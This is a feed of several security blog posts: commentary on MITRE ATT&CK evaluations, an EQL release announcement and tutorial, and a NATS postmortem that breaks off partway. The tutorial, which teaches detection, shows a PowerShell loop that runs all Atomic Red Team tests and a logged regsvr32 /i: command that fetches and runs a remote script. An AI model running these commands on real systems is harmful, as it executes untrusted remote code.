    The evaluation provides a massive amount of data and people will naturally wonder how to action that information. As we’ve described before (and we’re not the only ones), ATT&CK is not a measuring stick. It’s a knowledge base. Trying to use it as a universal, quantitative measurement device is a recipe for failure.

    We could probably spend entire posts delving into each of these items, and this list isn’t comprehensive, but some of the pitfalls and challenges inherent to trying to quantify ATT&CK include:

    • Not considering real world scenarios. In the real world, you don’t need to detect or block every component of an attack to disrupt an adversary or remediate an action. We build layered behavioral preventions and detections for our customers. These layers, working together, provide a vanishing probability of missing a real attack, even if we know it’s likely we won’t alert on every action taken in an attack. We know individual protections will sometimes miss or be bypassed. Similarly, incident responders will tell you that it’s a pipe dream if you ever imagine you will have a completely airtight picture of every technique used by an adversary in a known breach. 100% visibility is not necessary for effective remediation.
    • Lack of prioritization or weighting of techniques. Is deep, signatureless coverage of process injection more important than knowing that an attacker base64 encoded something on an already compromised box? For any enterprise team I can conceive of, yes, injection coverage is dramatically more important. There’s no notion of prioritization between techniques in ATT&CK. See this post we did last year for a deeper dive into ways technique coverage could be prioritized by teams according to their particular threat landscape and interests. MITRE hasn’t included prioritizations for a reason: it is not a weighted measurement tool, it’s a knowledge base. Turning it into a score sheet can be counterproductive.
    • ATT&CK is incomplete. MITRE does a great job updating ATT&CK as new techniques become known. This regularly happens due to white hat security research, adversary evolution, and new threat reporting. ATT&CK is by definition always behind the cutting edge in the real world, and it has gaps. The level of specificity in a given technique also varies widely. We are excited about future decomposition of techniques into sub-techniques, as there are usually a number of known methods to invoke a single technique. In this particular evaluation, you’ll note some cases where MITRE chose a few different ways to implement a single technique. This is good and reflective of reality. But, there are a huge number of untested alternative implementations even for the techniques used in this evaluation. Testing everything would be nearly impossible.
    • Noise in production. Is an alert better than telemetry? Sometimes yes, sometimes no. The majority of the activity described in ATT&CK is seen in most enterprises on a daily basis. We cannot seek alerting coverage across all of ATT&CK. It would overwhelm security teams with noise and FPs. Taking that idea further, we shouldn’t even overextend in an attempt to provide visibility to every cell - there are diminishing returns in the real-world in doing so.
    • Data robustness. Not all data is created equal in terms of enrichments and hardening against adversaries determined to get around your EDR solution. There’s a growing body of research around this topic, for example this excellent talk by William Burgess called “Red Teaming in the EDR Age.” We highly recommend it and similar work to anyone considering visibility. Many common sources of EDR data can be undermined by an attacker with access. At Endgame, we put a lot of effort into hardening our datasources. Not all EDR vendors do the same. This is an important factor but one which would not be easy to measure in an evaluation.
    • Evaluating the tool or the team? For a nuanced evaluation such as this, some amount of expertise and knowledge is required. In the MITRE evaluation, vendors were invited to deploy, configure, and participate in the evaluation on the blue team side. This makes tremendous sense, as MITRE had enough work to do beyond overcoming the often steep learning curve of the various EDR products. Endgame takes great pride in how our customers can consume and make use of advanced capabilities compared with the deep expertise required for other tools in this space. Assessing usability and accounting for a security team’s expertise would be very hard in an evaluation.
    • Not a full product assessment. Visibility is one important component of any endpoint security tool. Other important components include prevention, hardening (discussed above), response, usability, and a host of considerations around topics like deployment, endpoint impact, network impact, and more.

    None of this is intended as a criticism of MITRE’s evaluation. In fact, they’ve taken care not to overstate what the test is by providing information about evaluated products that is narrowly scoped around post-compromise visibility. They haven’t attempted to score or rank vendor products, and neither should we.

    Even teams new to ATT&CK should be working to incorporate it into their security program. There is a lot to consider, but there are ways to get started by taking small bites out of the huge ATT&CK sandwich. We’ve recently written about this topic, with some of that information available here.

    What about Endgame’s evaluation?

    We are pleased with how the evaluation describes our capabilities. Our agent provides visibility into the vast majority of techniques tested by MITRE in the evaluation, using a good balance of alerting behavioral detections and straightforward visibility into activity via our telemetry. Some of the noteworthy items in the results include:

    • ATT&CK Integration. The results showcase our product’s long standing ATT&CK integration where behavioral detections are linked to ATT&CK.
    • Access to Telemetry. MITRE’s results detail our interactive process tree, Endgame Resolver™. Telemetry is easily visible from this tree. It’s not readily apparent from static screenshots, but the entire tree is interactive and response actions can be taken right from the tree.
    • Enrichments. Custom enrichments are shown for ATT&CK-relevant items that didn’t make sense for alerting. For example, execution of ipconfig doesn’t create alerts on its own, but if it is related to processes with higher confidence alerting, the potential security relevancy of that ipconfig execution is highlighted for the user.
    • Memory Introspection. In-memory artifact capture is also showcased in the evaluation, with artifacts such as strings present in injected threads automatically captured for inspection.
    • Everyone Has Gaps and Differences. Some visibility gaps exist, and for most of those, we already have robust solutions in flight. For example, our customers will be excited to see enhanced network data capture in our next monthly release. In this ATT&CK evaluation, none of these gaps are news to us and we have some disagreement reflected in the Notes about whether some are actually gaps versus differences in evaluator expectations and workflow. That said, we look forward to continual assessment and relentless improvement.

    What’s next?

    We’re proud to have participated in this evaluation and look forward to participating again, should MITRE continue to lead evaluations. We look forward to continued collaboration with MITRE on ways to design and run both this evaluation and other competitive testing through our participation in AMTSO. And, we’ll continue to contribute to the community’s overall understanding of how to build a security program, including how to operationalize ATT&CK. And, of course, we’ll keep building and enhancing the Endgame platform for our current and future customers.

    EQL for the Masses


    EQL, or the Event Query Language, is an elegant, powerful, and extensible language built in-house at Endgame to express relationships between security-relevant events. We designed it from the ground up to be generic, apply to multiple use cases, and avoid reliance on any particular architecture.

    EQL is part of the core technology that drives our endpoint security product. It powers high confidence detections that run on customer endpoints, it is used to perform basic searching, and it gives hunt teams the tooling necessary to sift through massive amounts of endpoint data and detect intrusions. But there is nothing about the language itself that is inherently tied to Endgame.

    Up until now, the only way to use EQL was via the Endgame product. That changed today with the public release of EQL. This release includes the core EQL language, a schema mapping to Sysmon, and a set of analytics initially focused on Atomic Blue.

    Why did we build and open source this?

    It’s becoming a cliché, but it’s true: looking for signatures of known malware or infrastructure IOCs is helpful, but it’s not enough. Security practitioners must assume that adversaries have breached defenses and are conducting operations inside their networks. Because of this, security teams must not only worry about prevention, but also about how they can detect activity post-compromise.

    The security community has rallied around the MITRE ATT&CK framework as an important knowledge base of post-compromise adversary activity. We’ve been thrilled to see rapid growth in the number of security teams and researchers working to understand the detection opportunities and challenges in the post-compromise space. However, we note (as do many others) that the tools available to our community for universal expression of post-compromise analytics have some serious limitations which we’ll describe further below.

    Arguably the most significant challenge has been the coupling between everyone’s unique data sources and their analytics built on top of that data and corresponding schema(s). This has made it difficult to share actionable analytics between teams. After reading our introductory EQL blogpost, taking our product for a spin, or watching Endgame researchers talk about EQL, a number of researchers began talking to us about how EQL could fill this gap. This matches internal observations we’ve had for over a year - that if we release it to the community, EQL will improve the community’s collective ability to express detection logic and share amongst teams.

    While EQL has been linked to the Endgame product, there are no inherent ties or dependencies. We of course natively support a mapping to our rich endpoint-centric dataset, robust query support, and automated detections via EQL in our powerful architecture. However, mappings are possible to any security dataset, and we believe now is the time to allow people outside our customer base to use EQL.

    With this release, we are providing the core language, a sysmon integration, and a python-based EQL engine, which includes CLI functionality to run EQL queries over JSON. We’re also providing example analytics which are described later in this post. With this toolkit, users can immediately begin prototyping analytics in EQL.

    EQL Advantages

    We are not here to criticize other technologies and projects which have sought to achieve goals like common schemas, querying structure, and other things similar to what we’ve done with EQL. EQL has some significant advantages which we hope cause people in the security community to take a closer look, even if other technologies are being used or considered. These include:

    • Supporting the necessary logic to express relationships between security-relevant events. EQL can compare values and fields with exact or wildcard matching and supports basic AND, OR, NOT boolean search operations. Fields can be compared to strings, integers, decimal values, and against other fields. Most importantly, matching is enabled across a series of events including different types of events (e.g. process, file, and registry) rather than matching on only a single event.
    • Minimal learning curve to write analytics. EQL looks like many other query languages. It is intended to search across structured data in an intuitive manner which is highly conducive to quickly writing behavioral analytics. This also leads to excellent readability of each analytic. It also supports traditional IOC searching, but EQL makes it easy to accurately describe activity and behavior beyond simple IOCs.
    • No dependence on particular data sources or schema. Other technologies are tied closely to a given data source, and those writing analytics need to focus heavily on that particular data source and schema to write an analytic instead of just focusing on the logic they’re trying to express. EQL’s method of abstracting data sources via extensible schema mappings is powerful and allows for easy use without any need to pre-normalize data.
    • Built to hunt. EQL includes strong native post-processing capabilities such as sorting, filtering, and stacking, which allow a user to easily filter out noise. Its schema translation capability also makes it straightforward to extend across multiple data sources without a need for data normalization. Data normalization into the universal schema is supported for users who want to eliminate the need for query-time normalization.

    EQLLib and Atomic Blue

    We’re providing robust documentation on the many interesting EQL primitives and operators which are part of this release. We wanted to go further than just unleashing EQL on people in the form of a tool and documentation alone. To that end, we have provided a rich set of analytics called EQLLib to help people become familiar with the language and try things out.

    We’re huge fans of our partner Red Canary’s Atomic Red Team project. It is the most well-known and expansive test framework of adversary techniques out there. Adversary simulation projects are generally great in that they allow teams interested in detection aligned to the MITRE ATT&CK matrix to easily generate artifacts on systems.

    Atomic Red does a great job generating artifacts for the majority of techniques described by ATT&CK, but there’s no expansive mapping of Atomic Red into data source-agnostic language that a defender can action. Atomic Blue starts to fill this gap. Atomic Blue is a curated set of EQL logic which describes how to find endpoint artifacts associated with execution of a significant number of techniques covered by Atomic Red Team.

    You can find Atomic Blue within the EQLLib repository. This initial analytics repository is significant, but we’ve only scratched the surface of what’s possible, and we look to the community to help us expand even further.

    What’s next for this project?

    This initial release is the beginning of the journey, not the final destination. Next week, you’ll see an expanded “how-to” guide along with some data to make it even easier to use EQL. To expand the applicability of EQL, we plan to release support for additional data sources and technologies in the coming months. You’ll also see us releasing additional analytics on a regular basis as the technology expands and evolves.

    We’re looking forward to feedback and contributions from others. We strongly believe that we’re collectively lacking a good way to describe detection logic universally across datasets, and EQL is a great way to address this and other limitations. Please try it out and let us know what you think.


    Getting Started with EQL


    If you missed our introductory post about the Event Query Language (EQL) or our recent announcements about the public release of EQL, then we're sorry we missed you, but have no fear: this is your getting started guide for EQL.

    Event Query Language Refresher

    As a quick recap, EQL is a language for expressing relationships between events; it also has the power to normalize your data regardless of data source, unconstrained by platform. EQL is already integrated into the Endgame platform to bolster our behavior-based detections, but now that EQL has been open-sourced, you too can adopt the language and start writing your own adversarial detections, regardless of underlying technology. Whether you want to simply search with EQL, perform basic hunting via data stacking and filtering, or express complex behaviors as part of hypothesis-based hunting, EQL's flexibility as a language can help improve your team's effectiveness in many different ways.

    We also built a library of analytics written in EQL, aimed at providing a new way for the infosec community to detail detections of attacker techniques. The EQL Analytics Library comes with a set of behavior-based detections mapped to MITRE ATT&CK™, and can convert between various data formats. Please feel free to contribute analytics or contact us so we can help provide the blue perspective to the various red emulations out there.

    Install EQL

    First things first, let's install EQL. For full details, visit the EQL documentation.

    The EQL module currently supports Python 2.7 and 3.5 - 3.7. Assuming a supported Python version is installed, install EQL directly from PyPi with the command:

     

    $ pip install eql

    If Python is configured and already in the PATH, then eql will be readily available, and can be checked by running the command:

     

    $ eql --version

     

    eql 0.6.0

    Source code for EQL can be found here.

    Getting Data

    We know you are excited to execute an EQL query, so let's get some data ready for you.

    Our initial release required interested users to generate data. Being aware that this might represent a barrier to entry for some, we have provided a static test dataset to use while exploring the tool and syntax, which can be found here. This data was generated by executing subsets of Atomic Red and RTA while simultaneously collecting events using Sysmon. We additionally normalized the data, but that is not required to get you started on EQL. Keep in mind, we know the data is not perfect or complete, and we would gladly welcome a hand.

    Sysmon

    If you prefer to generate your own data by detonating your own scripts or directly running all tests from Atomic Red Team then follow our Sysmon guide.

    Install

    Start by downloading Sysmon from SysInternals.

    To install Sysmon, from a terminal, simply change to the directory where the unzipped binary is located, then run one of the following commands as an Administrator:

    To capture all default event types, with all hashing algorithms, run:

     

    $ Sysmon.exe -i -h * -n -l

    To configure Sysmon with a specific XML configuration file, run:

     

    $ Sysmon.exe -i C:\path\to\my\config.xml

    Full details of what each flag does can be found on the Microsoft Sysmon page.

    Getting Sysmon logs with PowerShell

    Helpful PowerShell functions for parsing Sysmon events from Windows Event Logs can be found in our utils directory, from within eqllib. The code below is from utils/scrape-events.ps1

    Getting logs into JSON format can be done by piping to PowerShell cmdlets within an elevated PowerShell.exe console.

     

    # Import the functions provided within scrape-events

    Import-Module .\utils\scrape-events.ps1

    # Save the most recent 5000 Sysmon logs

    Get-LatestLogs | Out-File -Encoding ASCII -FilePath my-sysmon-data.json

    # Save the most recent 1000 Sysmon process creation events

    Get-LatestProcesses | Out-File -Encoding ASCII -FilePath my-sysmon-data.json

    To get all Sysmon logs from Windows Event Logs, run the PowerShell command

     

    Get-WinEvent -filterhashtable @{logname="Microsoft-Windows-Sysmon/Operational"} -Oldest | Get-EventProps | ConvertTo-Json | Out-File -Encoding ASCII -FilePath my-sysmon-data.json

    Atomic Red Team

    Bringing Atomic Red Team into the mix, we can collect Sysmon data for every atomic test contained within. Atomic Red Team is an aggregation of atomic tests maintained by Red Canary, which replicate adversary behaviors described in MITRE ATT&CK.

    Once Sysmon is up and running, use the following PowerShell code to execute Atomic Red Team from the GitHub repository:

     

    [System.Collections.HashTable]$AllAtomicTests = @{}

    $AtomicFilePath = 'C:\AtomicRedTeam\atomics\' 

    Get-ChildItem $AtomicFilePath -Recurse -Filter *.yaml -File | ForEach-Object {

       $currentTechnique = [System.IO.Path]::GetFileNameWithoutExtension($_.FullName)  

       $parsedYaml = (ConvertFrom-Yaml (Get-Content $_.FullName -Raw ))

       $AllAtomicTests.Add($currentTechnique, $parsedYaml);

    }

    $AllAtomicTests.GetEnumerator() | Foreach-Object { Invoke-AtomicTest $_.Value }

    Now, as stated above, get all Sysmon logs from Windows Event Logs with the following  PowerShell command:

     

    Get-WinEvent -filterhashtable @{logname="Microsoft-Windows-Sysmon/Operational"} -Oldest | Get-EventProps | ConvertTo-Json | Out-File -Encoding ASCII -FilePath atomic-red-team-data.json

    Query like a Boss

    Enough is enough, let's write some rules! Please start by familiarizing yourself with EQL grammar and syntax, seen here or even from our initial blog post.

    For demo purposes, we will use the dataset titled normalized-sysmon-T1117-AtomicRed-regsvr32.json, which is an Atomic Red Team test for regsvr32 misuse. We encourage you to try some of these practices on larger datasets, which we have provided.

    Let's first get a feel for how many events we have in the data.

     

    $ eql query -f normalized-T1117-AtomicRed-regsvr32.json '| count'

    {"count": 150, "key": "totals"}

     

    To break this down even further, we can see how many of each event_type we have:

     

    $ eql query -f normalized-T1117-AtomicRed-regsvr32.json '| count event_type'

    {"count": 1, "key": "network", "percent": 0.006666666666666667}

    {"count": 4, "key": "process", "percent": 0.02666666666666667}

    {"count": 56, "key": "registry", "percent": 0.37333333333333335}

    {"count": 89, "key": "image_load", "percent": 0.5933333333333334}

     

    Great, so we have data; let's try to understand it further. Since we know this is T1117, maybe we want to look just for regsvr32?

     

    $ eql query -f normalized-sysmon-T1117-AtomicRed-regsvr32.json "process_name == 'regsvr32.exe' | count"

    {"count": 143, "key": "totals"}

     

    OK, as expected, we have regsvr32. Let's examine the command line artifacts and unique those results to see if we notice anything.

    $ eql query -f normalized-T1117-AtomicRed-regsvr32.json "process_name == 'regsvr32.exe' | unique command_line"

    {"command_line": "regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato... scrobj.dll", "event_type": "process", "logon_id": 217055, "parent_process_name": "cmd.exe", "parent_process_path": "C:\\Windows\\System32\\cmd.exe", "pid": 2012, "ppid": 2652, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "subtype": "create", "timestamp": 131883573237130000, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", "user": "ART-DESKTOP\\bob", "user_domain": "ART-DESKTOP", "user_name": "bob"}

    {"event_type": "image_load", "image_name": "regsvr32.exe", "image_path": "C:\\Windows\\System32\\regsvr32.exe", "pid": 2012, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "timestamp": 131883573237140000, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}"}

     

    As we can see, we have an atomic test loading scrobj.dll. Let’s check out our current analytics in eqllib. First, let’s look at the Suspicious Script Object Execution analytic:

     

    image_load where image_name == "scrobj.dll" and

       process_name in ("regsvr32.exe", "rundll32.exe", "certutil.exe")

    If we look at our dataset, what do we see?

    $ eql query -f normalized-T1117-AtomicRed-regsvr32.json "image_load where image_name == 'scrobj.dll' and process_name in ('regsvr32.exe', 'rundll32.exe', 'certutil.exe')"

    {"event_type": "image_load", "image_name": "scrobj.dll", "image_path": "C:\\Windows\\System32\\scrobj.dll", "pid": 2012, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "timestamp": 131883573237450016, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}"}

    Very cool, what about our Atomic Blue analytic within eqllib? We can run our existing analytic to see if it matches. The analytic looks like this:

     

    process where subtype.create and

     process_name == "regsvr32.exe" and

     wildcard(command_line, "*scrobj*", "*/i:*", "*-i:*", "*.sct*")

    Now, let’s switch to eqllib to use the available rules with our survey capability:

    $ eqllib survey -f normalized-T1117-AtomicRed-regsvr32.json eqllib/analytics/defense-evasion/T1117-scrobj-load.toml

    {"event_type": "image_load", "image_name": "scrobj.dll", "image_path": "C:\\Windows\\System32\\scrobj.dll", "pid": 2012, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "timestamp": 131883573237450016, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}"}

    Through EQL, you can also look across different event types. This is important because it allows us to chain events together for tighter detections and reduce the occurrence of false positives. Here we check whether the subsequent image load of scrobj.dll and a network event for downloading the remote sct file (or other C2 actions) also occur, which would indicate that the technique progressed and more likely succeeded. We can do all these things with EQL!

     

    $ eql query -f normalized-T1117-AtomicRed-regsvr32.json "sequence by pid [process where process_name in ('regsvr32.exe', 'rundll32.exe', 'certutil.exe')] [image_load where image_name == 'scrobj.dll'] [network where true]"

    {"command_line": "regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato... scrobj.dll", "event_type": "process", "logon_id": 217055, "parent_process_name": "cmd.exe", "parent_process_path": "C:\\Windows\\System32\\cmd.exe", "pid": 2012, "ppid": 2652, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "subtype": "create", "timestamp": 131883573237130000, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", "user": "ART-DESKTOP\\bob", "user_domain": "ART-DESKTOP", "user_name": "bob"}

    {"event_type": "image_load", "image_name": "scrobj.dll", "image_path": "C:\\Windows\\System32\\scrobj.dll", "pid": 2012, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "timestamp": 131883573237450016, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}"}

    {"destination_address": "151.101.48.133", "destination_port": "443", "event_type": "network", "pid": 2012, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "protocol": "tcp", "source_address": "192.168.162.134", "source_port": "50505", "subtype": "outgoing", "timestamp": 131883573238680000, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", "user": "ART-DESKTOP\\bob", "user_domain": "ART-DESKTOP", "user_name": "bob"}

    We could also take stdout and pipe it to PowerShell or jq to make pretty tables -- the power is yours.

    I feel Atomic Blue

    If you were the overachiever and detonated all the Atomic Red Team tests, then welcome to Atomic Blue (https://eqllib.readthedocs.io/en/latest/atomicblue.html).

    In the EQL Analytics Library, the analytics that map to Atomic Red Team are called Atomic Blue Detections. In our earlier blog post, we showed how these are detections that work in tandem with Atomic Red Team, since both are heavily influenced by the MITRE ATT&CK framework. Check out our current coverage by surveying the rules against the data you just collected by executing:

     

    $ eqllib survey atomic-red-team-data.json -s "Microsoft Sysmon" eqllib/rules/

    This survey script can also provide just counts, if you’re looking for a quick breakdown.

     

    $ eqllib survey atomic-red-team-data.json -s "Microsoft Sysmon" eqllib/rules/ --count

    How did we do? Wish we had more rules? Well, we can't spoil all the fun. We will have more analytics posted soon, but of course, please contribute and help out the community!  We want this to be a shared effort, with various types of analytics --even beyond ATT&CK.

    Analytic Pause

    Let's pause for a moment and talk analytics. You may have recognized that the metadata and query that make up each analytic are structured in TOML.

    A breakdown of the analytic schema is as follows:

    categories: The groups that the analytic belongs in. The detect category indicates that an analytic is potentially useful as an alert. The hunt category indicates that an analytic might catch more generic behavior, or a behavior that has false positives and frequently matches benign activity.

    contributors: Put your name or organization here!

    confidence: A gut feel about the confidence of the rule -- how likely the analytic is to match suspicious activity.

    created_date: When the rule was originally created.

    description: Short description of the analytic. This should describe how it works, what is supposed to be detected, and potential false positives.

    name: A descriptive, but not overly verbose, title for the rule.

    notes: Any disclaimers, caveats or other notes that would be helpful to share to the audience.

    os: What operating systems the analytic is written for. We’ve only written analytics for Windows so far, but welcome more!

    references: Links to blogs or other sources of information to support the technique or analytic logic.

    techniques: A mapping to the relevant ATT&CK techniques, (e.g. T1015).

    tactics: A mapping to the relevant ATT&CK tactics. This isn’t necessarily all of the potential tactics on the technique pages for ATT&CK, and often depends on the detection details.

    tags: Tags used for grouping the rule. For instance, all Atomic Blue rules are tagged with “atomicblue.”

    updated_date: When the rule was last updated.
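    As a rough illustration of the fields listed above, here is a hypothetical Go sketch (not eqllib's actual source -- the real analytics are plain TOML files, and the key names here are assumptions based on the list above):

    package analytics

    // Analytic is a hypothetical sketch of the analytic metadata described above.
    // Field and key names are illustrative, loosely mirroring the schema list.
    type Analytic struct {
        Categories   []string `toml:"categories"`   // e.g. "detect", "hunt"
        Contributors []string `toml:"contributors"`
        Confidence   string   `toml:"confidence"`
        CreatedDate  string   `toml:"created_date"`
        Description  string   `toml:"description"`
        Name         string   `toml:"name"`
        Notes        string   `toml:"notes"`
        OS           []string `toml:"os"`
        References   []string `toml:"references"`
        Techniques   []string `toml:"techniques"`   // e.g. "T1117"
        Tactics      []string `toml:"tactics"`
        Tags         []string `toml:"tags"`         // e.g. "atomicblue"
        UpdatedDate  string   `toml:"updated_date"`
        Query        string   `toml:"query"`        // the EQL query itself (key name assumed)
    }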

    Data Normalization

    You probably noticed the --source parameter when using eqllib:

    $ eqllib survey atomic-red-team-data.json -s "Microsoft Sysmon" eqllib/rules/ --count

    This is another powerful aspect of EQL. EQL queries are platform agnostic and can run on any data source, as long as we provide a data source schema mapping. For example, a process identifier is denoted by the pid field. If a new data source reports its process identifier with a field such as process_id, we represent this mapping as process_id -> pid. From there, any usage of pid is immediately compatible.

    We can also define more sophisticated mappings. In Sysmon, there is no field to represent the file name for a running process. Our schema calls this process_name, but in Sysmon it’s nested within the Image field. Since mappings can also be defined with functions, we can define a mapping from baseName(Image) to process_name. This mapping works both for normalizing data and for actual queries. For instance, process_name == "net.exe" will be converted to Image == "*\\net.exe". This is just one way that we achieve compatibility with data sources that make different data model choices.
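    To make the mapping idea concrete, here is a minimal, purely illustrative Go sketch (not eqllib's implementation; the field names come from the examples above) that renames Sysmon-style fields to the normalized schema names and derives process_name from the Image path:

    package main

    import (
        "fmt"
        "strings"
    )

    // baseName returns the final path component, handling both Windows and POSIX separators.
    func baseName(p string) string {
        if i := strings.LastIndexAny(p, `\/`); i >= 0 {
            return p[i+1:]
        }
        return p
    }

    // normalizeSysmon maps Sysmon-style field names (ProcessId, Image) to the
    // normalized schema names (pid, process_path, process_name).
    func normalizeSysmon(event map[string]string) map[string]string {
        out := map[string]string{}
        if v, ok := event["ProcessId"]; ok {
            out["pid"] = v
        }
        if v, ok := event["Image"]; ok {
            out["process_path"] = v
            out["process_name"] = baseName(v)
        }
        return out
    }

    func main() {
        raw := map[string]string{"ProcessId": "2012", "Image": `C:\Windows\System32\regsvr32.exe`}
        fmt.Println(normalizeSysmon(raw))
        // map[pid:2012 process_name:regsvr32.exe process_path:C:\Windows\System32\regsvr32.exe]
    }

    With a mapping like this in place, the same translation can be applied in reverse to queries, which is how process_name == "net.exe" becomes Image == "*\\net.exe".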

    This is a powerful construct - analytics written once can run on a wide variety of data sources and platforms. All we need is a mapping when field names differ.

    Currently we have Microsoft Sysmon mapped, with more sources to come. But you don’t have to wait for us. As you can see from the sysmon.toml schema, adding your own data sources is straightforward, and new source definitions are parsed automatically by eqllib.

    Have Fun!

    Please follow us @eventquerylang. We will be updating our docs soon with a section on how to contribute, but in the meantime please feel free to submit PRs or post issues. We look forward to sharing more blog posts in the near future as we write more analytics and share analytic packages specifically designed to help you hunt. Cheers!

    Here's why we can't have nice things

    $
    0
    0

    DATA MISAPPROPRIATION CHEAPENS MITRE ATT&CK EVALUATION, BUT HERE’S WHAT IS IMPORTANT...

    As a former Gartner analyst who led the EPP Magic Quadrant, I’m having a blast reading the vendor write-ups explaining their performance against the APT3-esque set of tests in the recent MITRE ATT&CK assessment, with vendors grabbing for one scoring algorithm that gives a single overall metric to prove who’s the best. 

    The unfortunate truth is that vendors are making a circus out of what is the most comprehensive assessment of EPP + EDR vendor capabilities to date.  

    I’m disappointed that so few vendors have spent time to highlight that the ability to provide detection data is only part of the problem. It’s just as important to consider how that data is made available to your organization’s security operators, and how much faster your teams can make educated, confident decisions to contain threats and block adversaries.  

    The MITRE assessment has almost no way to take into account the blue team capabilities required to use the products effectively. So, the bottom line is, to quote myself from 14 months ago:

    “Choose an EPP that improves the workflow, efficiency, and effectiveness of the tools and humans you have today.“ 

    With that in mind, there are some elements in this assessment that are of more importance than others to most organizations evaluating any EPP or EDR vendor. 

    1. NONE – The product did not detect this activity at all, a complete miss.

    2. NONE with Note – The product did not detect this activity as immediately malicious, but the data was captured and could be hunted.

    3. SPECIFIC BEHAVIOR & SPECIFIC BEHAVIOR TAINTED – A specific detection that indicates exactly which malicious activity occurred. The modifier TAINTED means that this detection was made as a by-product of a detection far earlier in the attack chain, and the data is available somewhere to confirm this detection.


    The first thing many IT Leaders ask is, "Which endpoint vendor blocks everything?" The answer to that is a quick and easy, "None of them."

    After “Which vendor blocks everything?” comes the question, “Okay then, who missed the most?”.  MITRE provides a good amount of data here which makes the question a little simpler to answer. 


    BUT – that doesn’t show the whole story. There are two versions of the detection type that MITRE uses to describe missed malicious activity: “None” and “None with note”.

    While “None” is self-explanatory – this activity completely bypassed detection methods and no data was collected that could point to it – “None with note” indicates that although a specific detection wasn’t highlighted by the vendor, the blue team was able to hunt and discover the activity.  In other words, which vendors collect the right types of event data to best enable the advanced part of EDR – Threat Hunting. 


    That’s the advanced part of the “ease of use” spectrum, but what really matters to the IT Leaders I’ve spoken to in the past week is contained in the “SPECIFIC” and “SPECIFIC TAINTED” detection types.  These mean that the platform tells you what matters, and you do not need an expert to tell you this specific event matters. It is the closest thing to usability guidance in this type of evaluation. 


    For those organizations with the time and expertise to invest in a full analysis tailored to their specific needs, the ATT&CK evaluation data is a gold mine. 

    You can dive into the results to see which vendors had a whole bunch of “DELAYED” detections (i.e., hours and days) because they rely on a managed service to watch for suspicious activity. You can look at the highly FP-prone generic detections that might get lucky. And you can take the data, decide what detection methods matter most to you, and build a scorecard that's right for you.

    As always, my cautions are that third-party tests are a great indicator of whether a vendor is fit for purpose and can certainly help organizations narrow down a shortlist of vendors. For the first time, our industry has a useful viewpoint into both prevention *and* detection/response capabilities. But they are data points, not decision points. It feels like Groundhog Day having to repeat it over and over again, but there is no one-size-fits-all, and usability should rank just as high in a shortlist or PoC.

    Postmortem: Beating the NATS race

    $
    0
    0

    At Endgame Engineering, we believe that a high standard for performance can’t exist without taking risks and learning from failure. It’s necessary for growth. We learn from other companies like Honeycomb.io and GitHub that document and publish their internal postmortems. These engineering teams understand transparency is fundamental to building great teams and delivering customer value with a SaaS product. We think so, too.

    We also believe it’s important to eat our own dog food. That’s why the very same endpoints we use to develop our product also run it. In October, we experienced a brief outage on this system. Production resiliency, to include our dogfooding instance, is paramount to our unique mission. We take all production incidents seriously.

    This postmortem provides an overview of the technology, a summary of the problem and its reproduction, and lessons learned. We are also releasing two tools we developed during this analysis to help others find and fix similar problems in the future.

    Background

    Last year we began migrating from RabbitMQ to nats.io, a Cloud Native Computing Foundation (CNCF) log-based streaming messaging system written in Go. NATS is simple, highly performant, and scalable.

    Simplicity matters. It makes a difference when an engineer is observing a complex, distributed, and rapidly evolving system. Have you ever seen an Erlang stack trace?

    Performance and scalability matter, too. Our customers protect online and disconnected endpoints with our product. NATS helps us deliver speed and scale for our customers. As Robin Morero says in this Pagero blog, “performance, simplicity, security and availability are the real DNA of NATS.”

    NATS is a compelling technology choice. Most of our microservices are written in Go. After an analysis by our engineering team, we started repaving most of our major microservice highways with NATS.

    Symptoms

    An initial triage narrowed the problem down to one of our NATS streaming server channels, sensor.session.open.

    This channel is used by sensor management microservices to notify subscribers when new endpoints are online. Messages published to this subject contain important information to route tasks to sensors.

    NATS provides monitoring endpoints to observe channels and subscribers.

    In the output from /channelsz below, last_seq is the count of messages published to sensor.session.open. For each subscriber, last_sent is the last message delivered and pending_count is the number of messages delivered but not yet acknowledged. Each subscriber's last_sent should be close or equal to last_seq when the system is behaving.

    [root@endgame log]# curl "http://localhost:8222/streaming/channelsz?offset=0&subs=1&channel=sensor.session.open"
    {
      "name": "sensor.session.open",
      "msgs": 4,
      "bytes": 4112,
      "first_seq": 11052,
      "last_seq": 11055,
      "subscriptions": [
        { 
          "client_id": "ActiveMon_29677", 
          "inbox": "_INBOX.4OxqodxyKwLDyEUZFoH3vk", 
          "ack_inbox": "_STAN.subacks.54V6hblM4Dt4B7KyUzRYy5.sensor.session.open.MlAS38Z7DK0TE1rZoocXEg", 
          "is_durable": false, 
          "is_offline": false, 
          "max_inflight": 1024, 
          "ack_wait": 30, 
          "last_sent": 11055, 
          "pending_count": 0, 
          "is_stalled": false 
        },
        { 
          "client_id": "SessBotOpen_29704_38898667", 
          "inbox": "_INBOX.d3KGu8K8HkoXZgt41F3Ihf", 
          "ack_inbox": "_STAN.subacks.54V6hblM4Dt4B7KyUzRYy5.sensor.session.open.MlAS38Z7DK0TE1rZoocXUD", 
          "queue_name": "sensor.session.open:sensor.session.openSessBotOpen.qg", 
          "is_durable": true, 
          "is_offline": false, 
